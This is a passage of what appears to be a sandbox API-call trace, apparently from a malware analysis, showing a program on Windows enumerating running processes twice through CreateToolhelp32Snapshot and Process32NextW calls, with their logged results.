cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.522] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.547] CloseHandle (hObject=0xc4) returned 1 [0154.547] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.554] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.562] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.563] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.607] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.609] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 